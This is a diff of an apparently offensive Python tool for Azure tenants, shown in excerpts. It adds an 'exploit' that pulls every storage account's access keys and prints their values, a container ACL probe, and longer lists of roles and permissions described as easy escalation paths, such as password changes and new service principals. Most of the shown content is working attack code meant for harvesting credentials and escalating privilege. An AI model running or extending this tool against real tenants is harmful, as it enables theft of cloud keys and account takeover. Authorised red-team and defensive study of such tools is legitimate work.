skipped 15 lines 16 16 Token = None 17 17 accessTokenGraph = None 18 18 accessTokenVault = None 19 + storageAccessToken = None 19 20 TotalTargets = [] 20 21 TargetSubscription = None 21 22 TargetTenantId = None skipped 166 lines 188 189 hasGraphAccess = False 189 190 hasVaultEnabled = False 190 191 Token = token 191 - listSubs = ListSubscriptionsForToken() 192 - TargetSubscription = listSubs['value'][0]['subscriptionId'] 193 - TargetTenantId = parseTenantId() 192 + try: 193 + listSubs = ListSubscriptionsForToken() 194 + TargetSubscription = listSubs['value'][0]['subscriptionId'] 195 + TargetTenantId = parseTenantId() 196 + except KeyError: 197 + pass 194 198 195 199 196 200 def originitToken(token): skipped 55 lines 252 256 result.append(item) 253 257 return result 254 258 259 + def ContainerACL(storageAccount): 260 + global storageAccessToken 261 + r = sendGETRequest("https://"+storageAccount+".blob.core.windows.net/dev?restype=container&comp=acl", accessTokenGraph) 262 + return r["status_code"] 263 + 255 264 def RD_ListAllUsers(): 256 265 global accessTokenGraph 257 266 r = sendGETRequest("https://graph.microsoft.com/v1.0/users/", accessTokenGraph) skipped 185 lines 443 452 item['resourceGroup'] = res['name'] 444 453 result.append(item) 445 454 return result 455 + def RD_ListAllStorageAccountsKeys(AccId): 456 + global Token 457 + r = sendPOSTRequest("https://management.azure.com/"+AccId+"/listKeys?api-version=2022-05-01", None, Token) 458 + return r['json'] 459 + 446 460 def RD_ListAllStorageAccounts(): 447 461 global Token 448 462 result = [] skipped 2 lines 451 465 for res in getResGroup(sub['subscriptionId'])['value']: 452 466 rsVM = sendGETRequest("https://management.azure.com/subscriptions/"+sub['subscriptionId']+"/resourceGroups/"+res['name']+"/providers/Microsoft.Storage/storageAccounts?api-version=2021-09-01", Token) 453 467 for item in rsVM['json']['value']: 468 + 454 469 item['subscriptionId'] = sub['subscriptionId'] 455 470 item['resourceGroup'] = res['name'] 456 471 skipped 237 lines 694 709 vaultAbuseCertAndKeysOnlyRoles = ["Key Vault Certificates Officer", "Key Vault Crypto Officer"] 695 710 shadowRisks = ["Cloud Application Administrator", "Application Administrator", "Password Administrator", 696 711 "Privileged Authentication Administrator", "Authentication Administrator", 697 - "Privileged Role Administrator", "User Account Administrator", "User Administartor ", 698 - "Helpdesk Administartor"] 712 + "Privileged Role Administrator", "User Account Administrator", "User Administrator " , " User Access Administrator ", 713 + "Helpdesk Administrator", "Directory Synchronization Accounts", "Hybrid Identity Administrator"] 699 714 classicAdministartors = ["Account Administrator", "Service Administrator", "Co-Administrator"] 700 715 if currentRoleName in vaultAbuseRoles: 701 716 return currentRoleName + "|" + "allows to retrieve secrets from key vault." skipped 7 lines 709 724 return currentRoleName + "|" + "Can read everything in Azure AD, without the ability to update." 710 725 elif currentRoleName == "Global Administrator" or currentRoleName == "Company Administrator": 711 726 return currentRoleName + "|" + "has a god mode, which can manage all aspects of Azure AD. (think like Domain Admin)" 727 + elif currentRoleName == "User Administrator" or currentRoleName == "Groups Administrators" or currentRoleName == "Directory Writers": 728 + return currentRoleName + "|" + "has permissions to modify group membership in Azure AD." 712 729 elif currentRoleName == "Virtual Machine Contributor": 713 730 return currentRoleName + "|" + "allows manage of VMs including disks, snapshots, extensions, and password restoration." 714 731 elif currentRoleName == "Automation Operator" or currentRoleName == "Automation Contributor": skipped 3 lines 718 735 elif currentRoleName == "User Access Administrator": 719 736 return currentRoleName + "|" + "has manage access to all resources within the subscription." 720 737 elif currentRoleName in shadowRisks: 721 - return currentRoleName + "|" + " has full directory admin rights, easy way to esclate." 738 + return currentRoleName + "|" + " has full directory admin rights, easy way to esclate ( i . e . use change password ) ." 722 739 elif currentRoleName in classicAdministartors: 723 740 return currentRoleName + "|" + "Is found as one of the three classic subscription administrative roles. Please notice: Service Administrator and Account Administrator are equivalent to the Owner role in the subscription." 724 741 elif currentRoleName == "Owner": skipped 18 lines 743 760 "Microsoft.Storage/listServiceSas/action"] 744 761 ARMTemplateAbuse = ["Microsoft.Resources/deployments/*"] 745 762 DirectoryAbuse = ["Microsoft.Resources/deployments/*"] 763 + AllowGroupModify = ["microsoft.directory/groups/members/update"] 764 + AllowUserCreation = ["microsoft.directory/users/create"] 765 + allowsSPCreation = ["microsoft.directory/servicePrincipals/create"] 766 + allowsSPUpdate = ["microsoft.directory/servicePrincipals/credentials/update"] 746 767 ExtensionsAbuse = ["Microsoft.ClassicCompute/virtualMachines/extensions/*", 747 768 "Microsoft.Compute/virtualMachines/extensions/read", 748 769 "Microsoft.Compute/virtualMachines/extensions/write"] skipped 10 lines 759 780 return "" + "|" + "That's means to have a Contributor/Owner permission on resources." 760 781 elif currentPermission in vmPermissions: 761 782 return currentPermission + "|" + "allows execute code on Virtual Machines." 783 + elif currentPermission in allowsSPCreation: 784 + return currentPermission + "|" + "allows creation of new application registration (service principle)." 785 + elif currentPermission in allowsSPUpdate: 786 + return currentPermission + "|" + "allows add service principle for an existing application registration." 787 + elif currentPermission in AllowGroupModify: 788 + return currentPermission + "|" + "allows modify group membership in Azure AD." 789 + elif currentPermission in AllowUserCreation: 790 + return currentPermission + "|" + "allows new user creation in Azure AD." 762 791 elif currentPermission in vmAllowDeployPermission: 763 - return currentPermission + "|" + "allows VM deployment or configuraiton of existing VM." 792 + return currentPermission + "|" + "allows VM deployment or configuration of existing VM." 764 793 elif currentPermission in StorangeAccountAbuse: 765 794 return currentPermission + "|" + "can abuse storage accounts (i.e., view blobs)." 766 795 elif currentPermission in ARMTemplateAbuse: skipped 242 lines 1009 1038 print(banner) 1010 1039 ''' 1011 1040 supportedCommands = [ 1012 - "test", 1013 1041 "whoami", 1014 1042 "scopes", 1015 1043 "get_subs", skipped 29 lines 1045 1073 "Reader/ListAppServiceSites", 1046 1074 "Reader/ListVirtualMachines", 1047 1075 "Reader/ListAllStorageAccounts", 1076 + "Reader/ListStorageAccountsKeys", 1048 1077 "Reader/ARMTemplatesDisclosure", 1049 - "Reader/ListServicePrincipal", 1078 + "Reader/ListServicePrincipals", 1050 1079 "Reader/abuseServicePrincipals", 1051 1080 "Contributor/ListACRCredentials", 1052 1081 "Contributor/ReadVaultSecret", skipped 23 lines 1076 1105 print("Use run command only within an exploit.") 1077 1106 elif mode == "whoami": 1078 1107 currentProfile() 1079 - elif mode == "test": 1080 - x = sendGETRequest("https://management.azure.com/subscriptions/?api-version=2017-05-10", Token) 1081 - print(dict(x['headers'])['Content-Type']) 1082 1108 elif mode == "scopes": 1083 1109 currentScope() 1084 1110 elif mode == "get_subs" or mode == "subs": skipped 459 lines 1544 1570 ) 1545 1571 AllStorageAccountRecordsCount += 1 1546 1572 print(make_table(field_names, rows)) 1573 + elif "Reader/ListStorageAccountsKeys" in ExploitChoosen and mode == "run": 1574 + print("Trying to list all storage accounts keys.. (it might take a few minutes)") 1575 + if len(RD_ListAllStorageAccounts()) < 1: 1576 + print("No Storage Accounts were found.") 1577 + else: 1578 + field_names = ["#", "Name", "Location", "Type", "Key", "Value", "Permissions", "Resource Group"] 1579 + rows = [] 1580 + AllStorageAccountRecordsCount = 0 1581 + for SARecord in RD_ListAllStorageAccounts(): 1582 + Data = RD_ListAllStorageAccountsKeys(SARecord['id']) 1583 + for key in Data['keys']: 1584 + rows.append( 1585 + {"#": AllStorageAccountRecordsCount, 1586 + "Name": SARecord['name'], 1587 + "Location": SARecord['location'], 1588 + "Type": SARecord['type'], 1589 + "Key": key['keyName'], 1590 + "Value": key['value'], 1591 + "Permissions": key['permissions'], 1592 + "Resource Group": SARecord['resourceGroup'] 1593 + } 1594 + ) 1595 + AllStorageAccountRecordsCount += 1 1596 + print(make_table(field_names, rows)) 1547 1597 elif "Reader/ListAllVaults" in ExploitChoosen and mode == "run": 1548 1598 print("Trying to list all vaults.. (it might take a few minutes)") 1549 1599 if len(RD_ListAllVaults()) < 1: skipped 49 lines 1599 1649 ) 1600 1650 AllVMRecordsCount += 1 1601 1651 print(make_table(field_names, rows)) 1602 - elif "Reader/ListServicePrincipal " in ExploitChoosen and mode == "run": 1652 + elif "Reader/ListServicePrincipals " in ExploitChoosen and mode == "run": 1603 1653 print("Trying to enumerate all service principles (App registrations)..") 1604 1654 if len(RD_AddAppSecret()) < 1: 1605 1655 print("No Apps registrations were found.") skipped 281 lines